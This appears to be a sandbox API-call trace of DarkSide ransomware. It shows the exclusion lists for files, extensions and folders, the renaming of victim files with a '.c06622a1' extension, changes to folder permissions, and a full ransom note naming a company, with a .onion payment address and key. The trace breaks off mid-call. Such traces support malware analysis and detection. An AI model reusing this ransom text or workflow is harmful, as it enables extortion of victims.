[0156.919] _wcsicmp (_Str1="autorun.inf", _Str2="YAg4SbqQt.avi") returned -24 [0156.919] wcslen (_String="autorun.inf") returned 0xb [0156.919] _wcsicmp (_Str1="boot.ini", _Str2="YAg4SbqQt.avi") returned -23 [0156.920] wcslen (_String="boot.ini") returned 0x8 [0156.920] _wcsicmp (_Str1="bootfont.bin", _Str2="YAg4SbqQt.avi") returned -23 [0156.920] wcslen (_String="bootfont.bin") returned 0xc [0156.920] _wcsicmp (_Str1="bootsect.bak", _Str2="YAg4SbqQt.avi") returned -23 [0156.920] wcslen (_String="bootsect.bak") returned 0xc [0156.920] _wcsicmp (_Str1="desktop.ini", _Str2="YAg4SbqQt.avi") returned -21 [0156.920] wcslen (_String="desktop.ini") returned 0xb [0156.920] _wcsicmp (_Str1="iconcache.db", _Str2="YAg4SbqQt.avi") returned -16 [0156.920] wcslen (_String="iconcache.db") returned 0xc [0156.920] _wcsicmp (_Str1="ntldr", _Str2="YAg4SbqQt.avi") returned -11 [0156.920] wcslen (_String="ntldr") returned 0x5 [0156.920] _wcsicmp (_Str1="ntuser.dat", _Str2="YAg4SbqQt.avi") returned -11 [0156.920] wcslen (_String="ntuser.dat") returned 0xa [0156.920] _wcsicmp (_Str1="ntuser.dat.log", _Str2="YAg4SbqQt.avi") returned -11 [0156.920] wcslen (_String="ntuser.dat.log") returned 0xe [0156.920] _wcsicmp (_Str1="ntuser.ini", _Str2="YAg4SbqQt.avi") returned -11 [0156.920] wcslen (_String="ntuser.ini") returned 0xa [0156.920] _wcsicmp (_Str1="thumbs.db", _Str2="YAg4SbqQt.avi") returned -5 [0156.920] wcslen (_String="thumbs.db") returned 0x9 [0156.920] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0156.920] wcslen (_String="386") returned 0x3 [0156.920] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0156.920] wcslen (_String="adv") returned 0x3 [0156.920] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0156.920] wcslen (_String="ani") returned 0x3 [0156.920] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0156.920] wcslen (_String="bat") returned 0x3 [0156.920] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0156.920] wcslen (_String="bin") returned 0x3 [0156.921] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0156.921] wcslen (_String="cab") returned 0x3 [0156.921] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0156.921] wcslen (_String="cmd") returned 0x3 [0156.921] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0156.921] wcslen (_String="com") returned 0x3 [0156.921] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0156.921] wcslen (_String="cpl") returned 0x3 [0156.921] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0156.921] wcslen (_String="cur") returned 0x3 [0156.921] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0156.921] wcslen (_String="deskthemepack") returned 0xd [0156.921] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0156.921] wcslen (_String="diagcab") returned 0x7 [0156.921] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0156.921] wcslen (_String="diagcfg") returned 0x7 [0156.921] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0156.921] wcslen (_String="diagpkg") returned 0x7 [0156.921] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0156.921] wcslen (_String="dll") returned 0x3 [0156.921] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0156.921] wcslen (_String="drv") returned 0x3 [0156.921] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0156.921] wcslen (_String="exe") returned 0x3 [0156.921] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0156.921] wcslen (_String="hlp") returned 0x3 [0156.921] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0156.921] wcslen (_String="icl") returned 0x3 [0156.921] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0156.921] wcslen (_String="icns") returned 0x4 [0156.921] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0156.922] wcslen (_String="ico") returned 0x3 [0156.922] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0156.922] wcslen (_String="ics") returned 0x3 [0156.922] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0156.922] wcslen (_String="idx") returned 0x3 [0156.922] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0156.922] wcslen (_String="ldf") returned 0x3 [0156.922] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0156.922] wcslen (_String="lnk") returned 0x3 [0156.922] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0156.922] wcslen (_String="mod") returned 0x3 [0156.922] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0156.922] wcslen (_String="mpa") returned 0x3 [0156.922] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0156.922] wcslen (_String="msc") returned 0x3 [0156.922] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0156.922] wcslen (_String="msp") returned 0x3 [0156.922] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0156.922] wcslen (_String="msstyles") returned 0x8 [0156.922] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0156.922] wcslen (_String="msu") returned 0x3 [0156.922] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0156.922] wcslen (_String="nls") returned 0x3 [0156.922] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0156.922] wcslen (_String="nomedia") returned 0x7 [0156.922] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0156.922] wcslen (_String="ocx") returned 0x3 [0156.922] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0156.922] wcslen (_String="prf") returned 0x3 [0156.922] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0156.922] wcslen (_String="ps1") returned 0x3 [0156.923] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0156.923] wcslen (_String="rom") returned 0x3 [0156.923] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0156.923] wcslen (_String="rtp") returned 0x3 [0156.923] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0156.923] wcslen (_String="scr") returned 0x3 [0156.923] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0156.923] wcslen (_String="shs") returned 0x3 [0156.923] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0156.923] wcslen (_String="spl") returned 0x3 [0156.923] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0156.923] wcslen (_String="sys") returned 0x3 [0156.923] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0156.923] wcslen (_String="theme") returned 0x5 [0156.923] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0156.923] wcslen (_String="themepack") returned 0x9 [0156.923] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0156.923] wcslen (_String="wpx") returned 0x3 [0156.923] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0156.923] wcslen (_String="lock") returned 0x4 [0156.923] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0156.923] wcslen (_String="key") returned 0x3 [0156.923] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0156.923] wcslen (_String="hta") returned 0x3 [0156.923] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0156.923] wcslen (_String="msi") returned 0x3 [0156.923] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0156.923] wcslen (_String="pdb") returned 0x3 [0156.923] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0156.923] wcslen (_String="sqlite") returned 0x6 [0156.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix")) returned 0x10 [0156.924] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.924] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx" [0156.924] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx") returned 0x34 [0156.924] wcscpy (in: _Dest=0x32400ca, _Source="YAg4SbqQt.avi" | out: _Dest="YAg4SbqQt.avi") returned="YAg4SbqQt.avi" [0156.924] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\YAg4SbqQt.avi", dwFileAttributes=0x80) returned 1 [0156.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\YAg4SbqQt.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\yag4sbqqt.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0156.924] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.924] ReadFile (in: hFile=0x1ac, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.925] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xab0c2954 [0156.925] RtlComputeCrc32 (PartialCrc=0x2954, Buffer=0x32e9a4, Length=0x80) returned 0x1d971b64 [0156.925] RtlComputeCrc32 (PartialCrc=0x1b64, Buffer=0x32e9a4, Length=0x80) returned 0x8f48d612 [0156.925] RtlComputeCrc32 (PartialCrc=0xd612, Buffer=0x32e9a4, Length=0x80) returned 0x536246a4 [0156.925] RtlComputeCrc32 (PartialCrc=0x46a4, Buffer=0x32e9a4, Length=0x80) returned 0x2b1eacd3 [0156.925] CloseHandle (hObject=0x1ac) returned 1 [0156.925] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.925] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\YAg4SbqQt.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\YAg4SbqQt.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\YAg4SbqQt.avi" [0156.925] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\YAg4SbqQt.avi") returned 0x42 [0156.925] wcscpy (in: _Dest=0x32500ec, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.925] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\YAg4SbqQt.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\yag4sbqqt.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\YAg4SbqQt.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\yag4sbqqt.avi.c06622a1"), dwFlags=0x8) returned 1 [0156.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zNgiUMtwIx\\YAg4SbqQt.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zngiumtwix\\yag4sbqqt.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0156.928] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.928] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3900020 [0156.935] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3a4db30e [0156.935] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x17cbf961 [0156.935] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x73496d12 [0156.935] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3a124372 [0156.935] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x407672f0 [0156.935] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1b00ffa4 [0156.935] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x19ee0638 [0156.935] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7a5ec958 [0156.938] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3900094, Length=0x80) returned 0x2254578a [0156.938] RtlComputeCrc32 (PartialCrc=0x578a, Buffer=0x3900094, Length=0x80) returned 0xe8c1c94e [0156.939] RtlComputeCrc32 (PartialCrc=0xc94e, Buffer=0x3900094, Length=0x80) returned 0xd0ddb381 [0156.939] RtlComputeCrc32 (PartialCrc=0xb381, Buffer=0x3900094, Length=0x80) returned 0x7876678f [0156.939] RtlComputeCrc32 (PartialCrc=0x678f, Buffer=0x3900094, Length=0x80) returned 0x13f42e46 [0156.939] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0156.939] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.939] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.939] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.939] FindClose (in: hFindFile=0x154148 | out: hFindFile=0x154148) returned 1 [0156.939] _wcsicmp (_Str1="backup", _Str2="zNgiUMtwIx") returned -24 [0156.939] wcslen (_String="backup") returned 0x6 [0156.939] _wcsicmp (_Str1="bak", _Str2="zNgiUMtwIx") returned -24 [0156.939] wcslen (_String="bak") returned 0x3 [0156.939] _wcsicmp (_Str1="back", _Str2="zNgiUMtwIx") returned -24 [0156.939] wcslen (_String="back") returned 0x4 [0156.939] _wcsicmp (_Str1="archive", _Str2="zNgiUMtwIx") returned -25 [0156.939] wcslen (_String="archive") returned 0x7 [0156.939] _wcsicmp (_Str1="bckp", _Str2="zNgiUMtwIx") returned -24 [0156.939] wcslen (_String="bckp") returned 0x4 [0156.939] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.940] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.941] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.941] FindClose (in: hFindFile=0x1327c8 | out: hFindFile=0x1327c8) returned 1 [0156.941] _wcsicmp (_Str1="backup", _Str2="Desktop") returned -2 [0156.941] wcslen (_String="backup") returned 0x6 [0156.941] _wcsicmp (_Str1="bak", _Str2="Desktop") returned -2 [0156.941] wcslen (_String="bak") returned 0x3 [0156.941] _wcsicmp (_Str1="back", _Str2="Desktop") returned -2 [0156.941] wcslen (_String="back") returned 0x4 [0156.941] _wcsicmp (_Str1="archive", _Str2="Desktop") returned -3 [0156.941] wcslen (_String="archive") returned 0x7 [0156.941] _wcsicmp (_Str1="bckp", _Str2="Desktop") returned -2 [0156.941] wcslen (_String="bckp") returned 0x4 [0156.941] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0156.942] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0156.943] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd958fd40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd958fd40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0156.943] _wcsicmp (_Str1="$recycle.bin", _Str2="Documents") returned -64 [0156.943] wcslen (_String="$recycle.bin") returned 0xc [0156.943] _wcsicmp (_Str1="config.msi", _Str2="Documents") returned -1 [0156.943] wcslen (_String="config.msi") returned 0xa [0156.943] _wcsicmp (_Str1="$windows.~bt", _Str2="Documents") returned -64 [0156.943] wcslen (_String="$windows.~bt") returned 0xc [0156.943] _wcsicmp (_Str1="$windows.~ws", _Str2="Documents") returned -64 [0156.943] wcslen (_String="$windows.~ws") returned 0xc [0156.943] _wcsicmp (_Str1="windows", _Str2="Documents") returned 19 [0156.943] wcslen (_String="windows") returned 0x7 [0156.943] _wcsicmp (_Str1="appdata", _Str2="Documents") returned -3 [0156.943] wcslen (_String="appdata") returned 0x7 [0156.943] _wcsicmp (_Str1="application data", _Str2="Documents") returned -3 [0156.943] wcslen (_String="application data") returned 0x10 [0156.943] _wcsicmp (_Str1="boot", _Str2="Documents") returned -2 [0156.943] wcslen (_String="boot") returned 0x4 [0156.943] _wcsicmp (_Str1="google", _Str2="Documents") returned 3 [0156.943] wcslen (_String="google") returned 0x6 [0156.943] _wcsicmp (_Str1="mozilla", _Str2="Documents") returned 9 [0156.943] wcslen (_String="mozilla") returned 0x7 [0156.943] _wcsicmp (_Str1="program files", _Str2="Documents") returned 12 [0156.944] wcslen (_String="program files") returned 0xd [0156.944] _wcsicmp (_Str1="program files (x86)", _Str2="Documents") returned 12 [0156.944] wcslen (_String="program files (x86)") returned 0x13 [0156.944] _wcsicmp (_Str1="programdata", _Str2="Documents") returned 12 [0156.944] wcslen (_String="programdata") returned 0xb [0156.944] _wcsicmp (_Str1="system volume information", _Str2="Documents") returned 15 [0156.944] wcslen (_String="system volume information") returned 0x19 [0156.944] _wcsicmp (_Str1="tor browser", _Str2="Documents") returned 16 [0156.944] wcslen (_String="tor browser") returned 0xb [0156.944] _wcsicmp (_Str1="windows.old", _Str2="Documents") returned 19 [0156.944] wcslen (_String="windows.old") returned 0xb [0156.944] _wcsicmp (_Str1="intel", _Str2="Documents") returned 5 [0156.944] wcslen (_String="intel") returned 0x5 [0156.944] _wcsicmp (_Str1="msocache", _Str2="Documents") returned 9 [0156.944] wcslen (_String="msocache") returned 0x8 [0156.944] _wcsicmp (_Str1="perflogs", _Str2="Documents") returned 12 [0156.944] wcslen (_String="perflogs") returned 0x8 [0156.944] _wcsicmp (_Str1="x64dbg", _Str2="Documents") returned 20 [0156.944] wcslen (_String="x64dbg") returned 0x6 [0156.944] _wcsicmp (_Str1="public", _Str2="Documents") returned 12 [0156.944] wcslen (_String="public") returned 0x6 [0156.944] _wcsicmp (_Str1="all users", _Str2="Documents") returned -3 [0156.944] wcslen (_String="all users") returned 0x9 [0156.944] _wcsicmp (_Str1="default", _Str2="Documents") returned -10 [0156.944] wcslen (_String="default") returned 0x7 [0156.944] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0156.944] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0156.944] wcscpy (in: _Dest=0x1d1044, _Source="Documents" | out: _Dest="Documents") returned="Documents" [0156.945] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0156.945] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.946] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0156.946] GetNamedSecurityInfoW () returned 0x0 [0156.946] SetEntriesInAclW () returned 0x0 [0156.947] SetNamedSecurityInfoW () returned 0x0 [0157.049] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17c310) returned 1 [0157.049] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0157.049] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 1 [0157.049] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0157.050] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0157.050] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0157.051] CloseHandle (hObject=0x1c) returned 1 [0157.051] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0157.051] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.051] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="" [0157.051] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 0x2c [0157.051] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x154148 [0157.052] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8b4e5500, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8b4e5500, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.053] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918f3140, ftCreationTime.dwHighDateTime=0x1d5df61, ftLastAccessTime.dwLowDateTime=0x8f683b20, ftLastAccessTime.dwHighDateTime=0x1d5da96, ftLastWriteTime.dwLowDateTime=0x8f683b20, ftLastWriteTime.dwHighDateTime=0x1d5da96, nFileSizeHigh=0x0, nFileSizeLow=0x453a, dwReserved0=0x0, dwReserved1=0x0, cFileName="3PvKyPdpu0lurMm.docx", cAlternateFileName="3PVKYP~1.DOC")) returned 1 [0157.053] _wcsicmp (_Str1="3PvKyPdpu0lurMm.docx", _Str2="README.c06622a1.TXT") returned -63 [0157.053] wcsstr (_Str="3PvKyPdpu0lurMm.docx", _SubStr="README") returned 0x0 [0157.053] _wcsicmp (_Str1="autorun.inf", _Str2="3PvKyPdpu0lurMm.docx") returned 46 [0157.053] wcslen (_String="autorun.inf") returned 0xb [0157.053] _wcsicmp (_Str1="boot.ini", _Str2="3PvKyPdpu0lurMm.docx") returned 47 [0157.053] wcslen (_String="boot.ini") returned 0x8 [0157.053] _wcsicmp (_Str1="bootfont.bin", _Str2="3PvKyPdpu0lurMm.docx") returned 47 [0157.053] wcslen (_String="bootfont.bin") returned 0xc [0157.053] _wcsicmp (_Str1="bootsect.bak", _Str2="3PvKyPdpu0lurMm.docx") returned 47 [0157.053] wcslen (_String="bootsect.bak") returned 0xc [0157.053] _wcsicmp (_Str1="desktop.ini", _Str2="3PvKyPdpu0lurMm.docx") returned 49 [0157.053] wcslen (_String="desktop.ini") returned 0xb [0157.053] _wcsicmp (_Str1="iconcache.db", _Str2="3PvKyPdpu0lurMm.docx") returned 54 [0157.053] wcslen (_String="iconcache.db") returned 0xc [0157.053] _wcsicmp (_Str1="ntldr", _Str2="3PvKyPdpu0lurMm.docx") returned 59 [0157.053] wcslen (_String="ntldr") returned 0x5 [0157.054] _wcsicmp (_Str1="ntuser.dat", _Str2="3PvKyPdpu0lurMm.docx") returned 59 [0157.054] wcslen (_String="ntuser.dat") returned 0xa [0157.054] _wcsicmp 